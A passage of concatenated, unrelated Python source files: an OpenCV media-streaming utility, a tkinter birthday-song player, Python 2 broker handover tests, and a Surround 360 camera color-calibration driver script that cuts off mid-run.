path = Path(path)
media_type: MediaType
if path is None:
media_type = MediaType.CAMERA
elif path.is_dir():
if _get_filenames(path, MediaType.IMAGE):
media_type = MediaType.IMAGE
elif path.is_file():
if _is_file_with_supported_extensions(path, _get_extensions(MediaType.IMAGE)):
media_type = MediaType.IMAGE
elif _is_file_with_supported_extensions(path, _get_extensions(MediaType.VIDEO)):
media_type = MediaType.VIDEO
else:
raise ValueError("File extension not supported.")
else:
raise ValueError("File or folder does not exist")
return media_type
def _get_extensions(media_type: MediaType) -> Tuple[str, ...]:
"""
Get extensions of the input media type.
:param media_type: Type of the media. Either image or video.
:return: Supported extensions for the corresponding media type.
:example:
>>> _get_extensions(media_type=MediaType.IMAGE)
('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp')
>>> _get_extensions(media_type=MediaType.VIDEO)
('.avi', '.mp4')
"""
return getattr(MEDIA_EXTENSIONS, media_type.name)
def _is_file_with_supported_extensions(path: Path, extensions: Tuple[str, ...]) -> bool:
"""
Check if the file is supported for the media type
:param path: File path to check
:param extensions: Supported extensions for the media type
:example:
>>> from pathlib import Path
>>> path = Path("./demo.mp4")
>>> extensions = _get_extensions(media_type=MediaType.VIDEO)
>>> _is_file_with_supported_extensions(path, extensions)
True
>>> path = Path("demo.jpg")
>>> extensions = _get_extensions(media_type=MediaType.IMAGE)
>>> _is_file_with_supported_extensions(path, extensions)
True
>>> path = Path("demo.mp3")
>>> extensions = _get_extensions(media_type=MediaType.IMAGE)
>>> _is_file_with_supported_extensions(path, extensions)
False
"""
return path.suffix.lower() in extensions
def _get_filenames(path: Union[str, Path], media_type: MediaType) -> List[str]:
"""
Get filenames from a directory or a path to a file.
:param path: Path to the file or to the location that contains files.
:param media_type: Type of the media (image or video)
:example:
>>> path = "../images"
>>> _get_filenames(path, media_type=MediaType.IMAGE)
['images/4.jpeg', 'images/1.jpeg', 'images/5.jpeg', 'images/3.jpeg', 'images/2.jpeg']
"""
extensions = _get_extensions(media_type)
filenames: List[str] = []
if media_type == MediaType.CAMERA:
raise ValueError(
"Cannot get filenames for camera. Only image and video files are supported."
)
if isinstance(path, str):
path = Path(path)
if path.is_file():
if _is_file_with_supported_extensions(path, extensions):
filenames = [path.as_posix()]
else:
raise ValueError("Extension not supported for media type")
if path.is_dir():
for filename in path.rglob("*"):
if _is_file_with_supported_extensions(filename, extensions):
filenames.append(filename.as_posix())
filenames = natsorted(filenames) # type: ignore[assignment]
if len(filenames) == 0:
raise FileNotFoundError(f"No {media_type.name} file found in {path}!")
return filenames
def _read_video_stream(stream: cv2.VideoCapture) -> Iterator[np.ndarray]:
"""
Read video and yield the frame.
:param stream: Video stream captured via OpenCV's VideoCapture
:return: Individual frame
"""
while True:
frame_available, frame = stream.read()
if not frame_available:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
yield frame
stream.release()
class BaseStreamer(metaclass=abc.ABCMeta):
"""
Base Streamer interface to implement Image, Video and Camera streamers.
"""
@abc.abstractmethod
def get_stream(self, stream_input):
"""
Get the streamer object, depending on the media type.
:param stream_input: Path to the stream or
camera device index in case to capture from camera.
:return: Streamer object.
"""
raise NotImplementedError
@abc.abstractmethod
def __iter__(self) -> Iterator[np.ndarray]:
"""
Iterate through the streamer object that is a Python Generator object.
:return: Yield the image or video frame.
"""
raise NotImplementedError
def _process_run(streamer: BaseStreamer, buffer: multiprocessing.Queue):
"""
Private function that is run by the thread.
Waits for the buffer to gain space for timeout seconds while it is full.
If no space was available within this time the function will exit
:param streamer: The streamer to retrieve frames from
:param buffer: The buffer to place the retrieved frames in
"""
for frame in streamer:
buffer.put(frame)
class ThreadedStreamer(BaseStreamer):
"""
Runs a BaseStreamer on a seperate thread.
:param streamer: The streamer to run on a thread
:param buffer_size: Number of frame to buffer internally
:example:
>>> streamer = VideoStreamer(path="../demo.mp4")
>>> threaded_streamer = ThreadedStreamer(streamer)
... for frame in threaded_streamer:
... pass
"""
def __init__(self, streamer: BaseStreamer, buffer_size: int = 2):
self.buffer_size = buffer_size
self.streamer = streamer
def get_stream(self, _=None) -> BaseStreamer:
return self.streamer
def __iter__(self) -> Iterator[np.ndarray]:
buffer: multiprocessing.Queue = multiprocessing.Queue(maxsize=self.buffer_size)
process = multiprocessing.Process(
target=_process_run, args=(self.get_stream(), buffer)
)
# Make thread a daemon so that it will exit when the main program exits as well
process.daemon = True
process.start()
try:
while process.is_alive() or not buffer.empty():
try:
yield buffer.get(timeout=0.1)
except queue.Empty:
pass
except GeneratorExit:
process.terminate()
finally:
process.join(timeout=0.1)
# The kill() function is only available in Python 3.7.
# Skip it if running an older Python version.
if sys.version_info >= (3, 7) and process.exitcode is None:
process.kill()
class VideoStreamer(BaseStreamer):
"""
Video Streamer
:param path: Path to the video file or directory.
:example:
>>> streamer = VideoStreamer(path="../demo.mp4")
... for frame in streamer:
... pass
"""
def __init__(self, path: str) -> None:
self.media_type = MediaType.VIDEO
self.filenames = _get_filenames(path, media_type=MediaType.VIDEO)
def get_stream(self, stream_input: str) -> cv2.VideoCapture:
return cv2.VideoCapture(stream_input)
def __iter__(self) -> Iterator[np.ndarray]:
for filename in self.filenames:
stream = self.get_stream(stream_input=filename)
yield from _read_video_stream(stream)
class CameraStreamer(BaseStreamer):
"""
Stream video frames from camera
:param camera_device: Camera device index e.g, 0, 1
:example:
>>> streamer = CameraStreamer(camera_device=0)
... for frame in streamer:
... cv2.imshow("Window", frame)
... if ord("q") == cv2.waitKey(1):
... break
"""
def __init__(self, camera_device: Optional[int] = None):
self.media_type = MediaType.CAMERA
self.camera_device = 0 if camera_device is None else camera_device
def get_stream(self, stream_input: int):
return cv2.VideoCapture(stream_input)
def __iter__(self) -> Iterator[np.ndarray]:
stream = self.get_stream(stream_input=self.camera_device)
yield from _read_video_stream(stream)
class ImageStreamer(BaseStreamer):
"""
Stream from image file or directory.
:param path: Path to an image or directory.
:example:
>>> streamer = ImageStreamer(path="../images")
... for frame in streamer:
... cv2.imshow("Window", frame)
... cv2.waitKey(0)
"""
def __init__(self, path: str) -> None:
self.media_type = MediaType.IMAGE
self.filenames = _get_filenames(path=path, media_type=MediaType.IMAGE)
@staticmethod
def get_stream(stream_input: str) -> Iterable[np.ndarray]:
image = cv2.imread(stream_input)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
yield image
def __iter__(self) -> Iterator[np.ndarray]:
for filename in self.filenames:
yield from self.get_stream(stream_input=filename)
def get_streamer(
path: Optional[str] = None,
camera_device: Optional[int] = None,
threaded: bool = False,
) -> BaseStreamer:
"""
Get streamer object based on the file path or camera device index provided.
:param path: Path to file or directory.
:param camera_device: Camera device index.
:param threaded: Threaded streaming option
"""
if path is not None and camera_device is not None:
raise ValueError(
"Both path and camera device is provided. Choose either camera or path to a image/video file."
)
media_type = get_media_type(path)
streamer: BaseStreamer
if path is not None and media_type == MediaType.IMAGE:
streamer = ImageStreamer(path)
elif path is not None and media_type == MediaType.VIDEO:
streamer = VideoStreamer(path)
elif media_type == MediaType.CAMERA:
if camera_device is None:
camera_device = 0
streamer = CameraStreamer(camera_device)
else:
raise ValueError("Unknown media type")
if threaded:
streamer = ThreadedStreamer(streamer)
return streamer
|
main.py
|
#!-*-coding:utf-8-*-
# !@Date: 2018/8/12 9:00
# !@Author: Liu Rui
# !@github: bigfoolliu
"""
tkinter + pygame + 所线程
一个线程用来播放音乐
另一个线程用来接收界面的操作
"""
from tkinter import *
import pygame
import threading
import time
class AppUI(object):
"""UI"""
def __init__(self):
# 定义主窗口
self.screen = Tk()
self.screen.title("生日歌播放器(by bigfoolliu)")
self.screen.resizable(width=False, height=False)
# 关键代码语句, 关闭程序时执行的语句
self.screen.protocol('WM_DELETE_WINDOW', self.close_window)
# 定义上下两个区域
self.frame_top = Frame(self.screen, width=400, height=80, bg="white")
self.frame_down = Frame(self.screen, width=400, height=80, bg="white")
self.frame_top.propagate(0)
self.frame_down.propagate(0)
# 配置上下两片区域的大小及位置
self.frame_top.pack(fill=BOTH, padx=5, pady=2.5)
self.frame_down.pack(fill=BOTH, padx=5, pady=2.5)
# 定义按钮以及标签变量
self.music_name = StringVar()
self.pause_resume = StringVar()
# 定义按钮以及标签
self.label_display = Label(self.frame_top, bg="#2CA3A8", textvariable=self.music_name, font=("arial", 20))
self.button_start = Button(self.frame_down, text="Start", font=("arial", 15), bg="#91BEFE",
command=self.button_play_click)
self.button_pause = Button(self.frame_down, textvariable=self.pause_resume, font=("arial", 15), bg="#91BEFE",
command=self.pause_click)
# 定义按钮初始状态
self.pause_resume.set("Pause")
self.button_pause["state"] = "disabled"
# 配置按钮以及标签位置
self.label_display.pack(fill=BOTH, expand=1)
self.button_pause.pack(fill=BOTH, expand=1, side=LEFT, padx=2)
self.button_start.pack(fill=BOTH, expand=1, side=LEFT, padx=2)
self.play_flag = 0
def button_play_click(self):
"""按下播放按钮"""
# 创建线程来播放音乐,主线程用来播放音乐
self.play_flag = 1
play_threading = threading.Thread(target=self.play)
play_threading.setDaemon(0)
play_threading.start()
# 该表按钮的状态
self.button_start["state"] = "disabled"
self.button_pause["state"] = "normal"
def play(self):
"""播放音乐以及显示歌词"""
pygame.mixer.init()
while self.play_flag: # 子线程持续监听播放标志
if not pygame.mixer.music.get_busy(): # 如果当前没有其他正在播放的音乐
print("当前正在播放歌曲: It‘s your day.mp3...")
self.music_name.set("It‘s your day.mp3 playing...")
pygame.mixer.music.load("res/It‘s your day.mp3") # 加载音乐
pygame.mixer.music.play(1) # 播放一次, 注意这里是流的方式播放, 运行会持续进行,代码块均会执行
else:
time.sleep(0.2)
def pause_click(self):
"""暂停与重新开始播放"""
if self.pause_resume.get() == 'Pause':
pygame.mixer.music.pause()
self.pause_resume.set('Resume')
elif self.pause_resume.get() == 'Resume':
pygame.mixer.music.unpause()
self.pause_resume.set('Pause')
def close_window(self):
"""关闭窗口"""
self.play_flag = 0
try:
# 停止播放,如果已停止,再次停止时会抛出异常,所以放在异常处理结构中
pygame.mixer.music.stop()
pygame.mixer.quit()
except:
print("结束进程出现错误!")
self.screen.destroy()
if __name__ == '__main__':
app_ui = AppUI() # 界面初始化
app_ui.screen.mainloop()
|
handover.py
|
# Copyright (C) 2013 Sony Mobile Communications AB.
# All rights, including trade secret rights, reserved.
import json
import time
import traceback
from ave.network.process import Process
from ave.network.exceptions import *
from ave.broker._broker import validate_serialized, RemoteBroker, Broker
from ave.broker.session import RemoteSession
from ave.broker.exceptions import *
import setup
# check that a broker with trivial allocations can have its state serialized
@setup.brokers([],'master',[],False,False)
def t1(HOME, master):
pretty = '%s t1' % __file__
print(pretty)
try:
s = master.serialize()
except Exception, e:
print('FAIL %s: trivial serialization failed: %s' % (pretty, str(e)))
return False
try:
validate_serialized(s)
except Exception, e:
print('FAIL %s: could not validate adoption: %s' % (pretty, str(e)))
return False
return True
# like t1 but with some allocations
@setup.brokers([],'master',[],False,False)
def t2(HOME, master):
pretty = '%s t2' % __file__
print(pretty)
c1 = RemoteBroker(master.address, authkey=master.authkey, home=HOME.path)
c1.get_resources({'type':'handset'}, {'type':'workspace'})
c2 = RemoteBroker(master.address, authkey=master.authkey, home=HOME.path)
c2.get_resources({'type':'handset'}, {'type':'relay'})
try:
s = master.serialize()
except Exception, e:
print('FAIL %s: trivial serialization failed: %s' % (pretty, str(e)))
return False
try:
validate_serialized(s)
except Exception, e:
print('FAIL %s: could not validate adoption: %s' % (pretty, str(e)))
return False
return True
# trivial handover between two brokers: no allocations. more or less just check
# that the takeover can be started on the same port as the handover and that
# configuration data is the same
@setup.factory()
def t3(factory):
pretty = '%s t3' % __file__
print(pretty)
handover = factory.make_master('master')
adoption,config,fdtx_path = handover.begin_handover() # stops listening
try:
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
except Exception, e:
print('FAIL %s: could not start takeover: %s' % (pretty, str(e)))
return False
try:
handover.end_handover(1)
except ConnectionClosed:
pass
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, str(e)))
return False
# compare the config and serialization of the two
c = takeover.get_config()
if c != config:
print('FAIL %s: configuration mismatch: %s != %s' % (pretty, c, config))
return False
return True
# make a few allocations, then handover. check that both brokers show the same
# availability of equipment
@setup.factory()
def t4(factory):
pretty = '%s t4' % __file__
print(pretty)
handover = factory.make_master('master')
avail_1 = handover.list_available()
# make some allocations
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
# hand over
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# check that availability is correct. stop the sessions started against the
# handover and check that the resources become availabe in the takeover
result = takeover.list_available()
if len(result) != len(avail_3):
print('FAIL %s: wrong avail 3: %s != %s' % (pretty, result, avail_3))
return False
ok = False
del(c2)
for i in range(10): # allow some time for brokers to detect session death
result = takeover.list_available()
if len(result) == len(avail_2):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong avail 2: %s != %s' % (pretty, result, avail_2))
return False
ok = False
del(c1)
for i in range(10): # allow some time for brokers to detect session death
result = takeover.list_available()
if len(result) == len(avail_1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong avail 1: %s != %s' % (pretty, result, avail_2))
return False
return True
# kill off one of the original sessions during the handover and check that the
# associated resources become available in the takeover
@setup.factory()
def t5(factory):
pretty = '%s t5' % __file__
print(pretty)
handover = factory.make_master('master')
avail_1 = handover.list_available()
# make some allocations
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
adoption,config,fdtx_path = handover.begin_handover()
session = RemoteSession(h2.address, h2.authkey)
try:
session.crash() # kill the second session during the handover
except ConnectionClosed:
pass
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
result = takeover.list_available()
if len(result) != len(avail_2):
print('FAIL %s: wrong avail: %s != %s' % (pretty, result, avail_2))
return False
return True
# make sure one of the sessions is super busy during the handover so that it
# cannot engage in communication with the takeover during session adoption
@setup.factory()
def t6(factory):
pretty = '%s t6' % __file__
print(pretty)
handover = factory.make_master('master')
avail = handover.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
w.run('sleep 3') # right, extremely busy, but it prevents other action
while True:
time.sleep(1) # don't let client die and loose all resources
p = Process(target=oob_client, args=(handover.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(handover.list_available()) != len(avail):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: catastrophic' % pretty)
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
result = True
if len(takeover.list_available()) == len(avail):
print('FAIL %s: wrong avail: %s' % (pretty, avail))
result = False
p.terminate()
p.join()
return result
# check that resources of super busy sessions are reclaimed when the session
# finally dies
@setup.factory()
def t7(factory):
pretty = '%s t7' % __file__
print(pretty)
handover = factory.make_master('master')
avail = handover.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
w.run('sleep 2') # right, extremely busy, but it prevents other action
p = Process(target=oob_client, args=(handover.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(handover.list_available()) != len(avail):
ok = True
break
time.sleep(0.1)
if not ok:
print('FAIL %s: catastrophic' % pretty)
p.terminate()
p.join()
return False
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# now wait for the client to die, so that its session dies, so that
# the takeover detects this, so that the associated resouces can be reclaimed,
# so that the takeover's availability is the same as when we started
ok = False
for i in range(10):
if len(takeover.list_available()) == len(avail):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: super busy session not tracked correctly' % pretty)
p.terminate()
p.join()
return ok
# check that sessions survive multiple broker restarts
@setup.factory()
def t8(factory):
pretty = '%s t8' % __file__
print(pretty)
original = factory.make_master('master')
avail = original.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
while True:
time.sleep(1)
p = Process(target=oob_client, args=(original.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(original.list_available()) != len(avail):
ok = True
break
time.sleep(0.1)
if not ok:
print('FAIL %s: catastrophic' % pretty)
p.terminate()
p.join()
return False
# do two handovers in a row
adoption,config,fdtx_path = original.begin_handover()
interim = factory.make_takeover('master', adoption, config, fdtx_path)
original.end_handover(1)
adoption,config,fdtx_path = interim.begin_handover()
final = factory.make_takeover('master', adoption, config, fdtx_path)
interim.end_handover(1)
# check that all brokers have the same availability
a1 = original.list_available()
a2 = interim.list_available()
a3 = final.list_available()
if len(a1) != len(a2) != len(a3):
print(
'FAIL %s: a handover failed somewhere: %s != %s != %s'
% (pretty, a1, a2, a3)
)
p.terminate()
p.join()
return False
# kill the client so that the brokers reclaim the equipment
p.terminate()
p.join()
ok = False
for i in range(10):
a3 = final.list_available()
if len(a3) == len(avail):
ok = True
break
if not ok:
print(
'FAIL %s: wrong availability: %d %d %d %d'
% (pretty, len(a1), len(a2), len(a3), len(avail))
)
return False
# check that the original and interim brokers have terminated now that they
# don't have any sessions with allocations
try:
original.ping() # ping
except Exit, e:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
try:
interim.ping() # ping
except Exit, e:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
# check that clients still attached to the handover get Restarting exceptions
# when they try to allocate after the handover has been done. this *can* be
# fixed so that clients migrate automatically, but it is difficult and I would
# prefer to not implement it unless there a strong case can be made for it
@setup.factory()
def t9(factory):
pretty = '%s t9' % __file__
print(pretty)
handover = factory.make_master('master')
client = RemoteBroker(handover.address, home=factory.HOME.path)
# make first allocation
h,w = client.get_resources({'type':'handset'}, {'type':'workspace'})
# hand over
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# make seconc allocation
try:
client.get({'type':'handset'})
print('FAIL %s: second allocation did not fail' % pretty)
return False
except Restarting:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
# check that a restarted share shows up again in its master
@setup.factory()
def t10(factory):
pretty = '%s t10' % __file__
print(pretty)
master = factory.make_master('master')
share = factory.make_share(master, 'share')
share.start_sharing()
time.sleep(1)
client = RemoteBroker(address=master.address, home=factory.HOME.path)
h = client.get_resources({'type':'handset', 'serial':'share-1'})
a1 = master.list_available()
# restart the share
adoption,config,fdtx_path = share.begin_handover()
takeover = factory.make_takeover('share', adoption, config, fdtx_path)
a2 = master.list_available()
if len(a1) == len(a2):
print('FAIL %s: shared resources still visible: %s' % (pretty, a2))
return False
# finish the handover so that takeover can start accepting RPC's. then
# check that the master sees all equipment except the one allocated
share.end_handover(1)
ok = False
for i in range(10):
a3 = master.list_available()
if len(a3) == len(a1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong availability: %s' % (pretty, a3))
return False
for profile in a3:
if 'serial' in profile and profile['serial'] == 'share-1':
print('FAIL %s: busy equipment shared' % pretty)
return False
# finally check that the resource can still be manipulated
try:
p = h.get_profile()
if p['serial'] != 'share-1':
print('FAIL %s: wrong profile: %s' % (pretty, p))
return False
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, e))
return False
return True
# check that shares reconnect to a restarted master
@setup.factory()
def t11(factory):
pretty = '%s t11' % __file__
print(pretty)
master = factory.make_master('master')
share = factory.make_share(master, 'share')
share.start_sharing()
time.sleep(1)
client = RemoteBroker(address=master.address, home=factory.HOME.path)
h1 = client.get_resources({'type':'handset', 'serial':'share-1'})
h2 = client.get_resources({'type':'handset', 'serial':'master-1'})
a1 = master.list_available()
# restart the master
adoption,config,fdtx_path = master.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
master.end_handover(1)
# connect to the new master and check the availability again
master = RemoteBroker(address=master.address, home=factory.HOME.path)
ok = False
for i in range(10):
a2 = master.list_available()
if len(a2) == len(a1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong availability: %s' % (pretty, a2))
return False
for profile in a2:
if 'serial' in profile and profile['serial'] == 'share-1':
print('FAIL %s: busy equipment shared' % pretty)
return False
return True
# check that .end_handover() doesn't time out even if the takeover did not get
# any sessions to adopt. regression test
@setup.factory()
def t12(factory):
pretty = '%s t12' % __file__
print(pretty)
master = factory.make_master('master')
adoption,config,fdtx_path = master.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
try:
master.end_handover(1)
except ConnectionClosed:
pass
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, e))
return False
return True
# check that the handover exits when the last session terminates
@setup.factory()
def t13(factory):
pretty = '%s t13' % __file__
print(pretty)
handover = factory.make_master('master')
# make some sessions
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# crash the sessions
session = RemoteSession(h1.address, h1.authkey)
try:
session.crash()
except ConnectionClosed:
pass
session = RemoteSession(h2.address, h2.authkey)
try:
session.crash()
except ConnectionClosed:
pass
for i in range(10): # wait until only one session remains, then close it
authkeys = handover.get_session_authkeys()
if len(authkeys) == 1:
break
time.sleep(0.3)
# check that the handover sends its exit message when the last session is
# closed
try:
handover.close_session(authkeys[0])
except Exit, e:
if str(e) != 'broker restarted. please reconnect':
print('FAIL %s: wrong exit message: %s' % (pretty, str(e)))
return False
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
try:
handover.ping() # ping
except ConnectionClosed:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
|
color_calibrate_all.py
|
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE_render file in the root directory of this subproject. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import argparse
import datetime
import json
import os
import re
import subprocess
import sys
import threading
import time
from timeit import default_timer as timer
script_dir = os.path.dirname(os.path.realpath(__file__))
# os.path.dirname(DIR) is the parent directory of DIR
surround360_render_dir = os.path.dirname(script_dir)
TITLE = "Surround 360 - Color Calibration"
COLOR_CALIBRATION_COMMAND_TEMPLATE = """
{SURROUND360_RENDER_DIR}/bin/TestColorCalibration
--image_path "{IMAGE_PATH}"
--illuminant {ILLUMINANT}
--isp_passthrough_path "{ISP_JSON}"
--num_squares_w {NUM_SQUARES_W}
--num_squares_h {NUM_SQUARES_H}
--min_area_chart_perc {MIN_AREA_CHART_PERC}
--max_area_chart_perc {MAX_AREA_CHART_PERC}
--output_data_dir "{OUTPUT_DIR}"
--log_dir "{LOG_DIR}"
--logbuflevel -1
--stderrthreshold 0
{FLAGS_EXTRA}
"""
ILLUMINANTS = ["D50", "D65"]
def list_tiff(src_dir): return [os.path.join(src_dir, fn) for fn in next(os.walk(src_dir))[2] if fn.endswith('.tiff')]
def parse_args():
parse_type = argparse.ArgumentParser
parser = parse_type(description=TITLE, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--data_dir', help='directory containing raw calibration images', required=True)
parser.add_argument('--output_dir', help='output directory', required=False)
parser.add_argument('--illuminant', help='illuminant', required=False, choices=ILLUMINANTS, default=ILLUMINANTS[0])
parser.add_argument('--black_level_hole', help='if true, get black from black hole in image', action='store_true')
parser.add_argument('--black_level_hole_pixels', help='estimated size of black hole (pixels)', required=False, default=500)
parser.add_argument('--black_level_y_intercept', help='if true, get black level from Y-intercept of RGB response', action='store_true')
parser.add_argument('--black_level_adjust', help='if true, sets each channel black level to median of all cameras', action='store_true')
parser.add_argument('--black_level', help='manual black level', required=False, default='NONE')
parser.add_argument('--num_squares_w', help='number of squares horizontally', required=False, default='6')
parser.add_argument('--num_squares_h', help='number of squares vertically', required=False, default='4')
parser.add_argument('--min_area_chart_perc', help='expected min chart area (% of entire image)', required=False, default='0.5')
parser.add_argument('--max_area_chart_perc', help='expected max chart area (% of entire image)', required=False, default='40.0')
return vars(parser.parse_args())
def start_subprocess(name, cmd):
global current_process
current_process = subprocess.Popen(cmd, shell=True)
current_process.name = name
current_process.communicate()
def print_and_save(file_out, str):
print str
file_out.write(str)
sys.stdout.flush()
def save_step_runtime(file_out, step, runtime_sec):
text_runtime = "\n" + step + " runtime: " + str(datetime.timedelta(seconds=runtime_sec)) + "\n"
file_out.write(text_runtime)
print text_runtime
sys.stdout.flush()
def run_step(step, cmd, file_runtimes):
file_runtimes.write("\n" + cmd + "\n")
print cmd + "\n"
sys.stdout.flush()
start_time = timer()
start_subprocess(step, cmd)
save_step_runtime(file_runtimes, step, timer() - start_time)
def run_threads(thread_list):
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
def median(list):
q, r = divmod(len(list), 2)
return sorted(list)[q] if r else sum(sorted(list)[q - 1:q + 1]) / 2.0
if __name__ == "__main__":
args = parse_args()
data_dir = args["data_dir"]
illuminant = args["illuminant"]
black_level_hole = args["black_level_hole"]
black_level_hole_pixels = args["black_level_hole_pixels"]
black_level_y_intercept = args["black_level_y_intercept"]
black_level_adjust = args["black_level_adjust"]
black_level = args["black_level"]
num_squares_w = int(args["num_squares_w"])
num_squares_h = int(args["num_squares_h"])
min_area_chart_perc = float(args["min_area_chart_perc"])
max_area_chart_perc = float(args["max_area_chart_perc"])
print "\n--------" + time.strftime(" %a %b %d %Y %H:%M:%S %Z ") + "-------\n"
os.chdir(surround360_render_dir)
if illuminant not in ILLUMINANTS:
sys.stderr.write("Unrecognized illuminant setting: " + illuminant + "\n")
exit(1)
if args["output_dir"] is not None:
out_dir = args["output_dir"]
else:
out_dir = data_dir + "/output"
os.system("mkdir -p \"" + out_dir + "\"")
isp_dir = data_dir + "/isp"
os.system("mkdir -p \"" + isp_dir + "\"")
file_runtimes = open(out_dir + "/runtimes.txt", 'w', 0)
start_time = timer()
isp_passthrough_json = surround360_render_dir + "/res/config/isp/passthrough.json"
raw_charts = list_tiff(data_dir + "/charts")
flags_extra = ""
if black_level_hole:
flags_extra += " --black_level_hole --black_level_hole_pixels " + str(black_level_hole_pixels)
elif black_level_y_intercept:
flags_extra += " --black_level_y_intercept"
elif black_level != 'NONE':
flags_extra += " --black_level \"" + black_level + "\""
flags_extra += " --save_debug_images"
out_dirs = {}
camera_names = {}
thread_list = []
for i in range(len(raw_charts)):
camera_names[i] = os.path.basename(raw_charts[i]).split('.')[0]
out_dirs[i] = out_dir + "/" + camera_names[i]
color_calibrate_params = {
"SURROUND360_RENDER_DIR": surround360_render_dir,
"IMAGE_PATH": raw_charts[i],
"ILLUMINANT": illuminant,
"ISP_JSON": isp_passthrough_json,
"NUM_SQUARES_W": num_squares_w,
"NUM_SQUARES_H": num_squares_h,
"MIN_AREA_CHART_PERC": min_area_chart_perc,
"MAX_AREA_CHART_PERC": max_area_chart_perc,
"OUTPUT_DIR": out_dirs[i],
"LOG_DIR": out_dirs[i],
"FLAGS_EXTRA": flags_extra,
}
color_calibrate_command = COLOR_CALIBRATION_COMMAND_TEMPLATE.replace("\n", " ").format(**color_calibrate_params)
t = threading.Thread(target=run_step, args=(camera_names[i], color_calibrate_command, file_runtimes,))
thread_list.append(t)
run_threads(thread_list)
if black_level_adjust:
### Adapt all cameras to same per-channel black level (median) ###
print "Adjusting black levels...\n"
step = "black_level_adjusted"
NUM_CHANNELS = 3
black_levels = [[] for j in range(NUM_CHANNELS)]
for i in range(len(out_dirs)):
black_level = json.loads(open("\"" + out_dirs[i] + "/black_level.txt\"").read())
print_and_save(file_runtimes, camera_names[i] + ": " + str(black_level) + "\n")
for j in range(NUM_CHANNELS):
black_levels[j].append(black_level[j])
out_dirs[i] += "_" + step
black_level_median = [median(black_levels[j]) for j in range(NUM_CHANNELS)]
print_and_save(file_runtimes, "Black level median: " + str(black_level_median) + "\n")
flags_extra += " --black_level \"" + " ".join(map(str, black_level_median)) + "\""
thread_list = []
for i in range(len(raw_charts)):
color_calibrate_params = {
"SURROUND360_RENDER_DIR": surround360_render_dir,
"IMAGE_PATH": raw_charts[i],
"ILLUMINANT": illuminant,
"ISP_JSON": isp_passthrough_json,
"NUM_SQUARES_W": num_squares_w,
"NUM_SQUARES_H": num_squares_h,
"MIN_AREA_CHART_PERC": min_area_chart_perc,
"MAX_AREA_CHART_PERC": max_area_chart_perc,
"OUTPUT_DIR": out_dirs[i],
"LOG_DIR": out_dirs[i],
"FLAGS_EXTRA": flags_extra,
}
color_calibrate_command = COLOR_CALIBRATION_COMMAND_TEMPLATE.replace("\n", " ").format(**color_calibrate_params)
t = threading.Thread(target=run_step, args=(camera_names[i] + " second pass", color_calibrate_command, file_runtimes,))
thread_list.append(t)
run_threads(thread_list)
print "Finding worst-case X-intercepts...\n"
intercept_x_min = 1.0
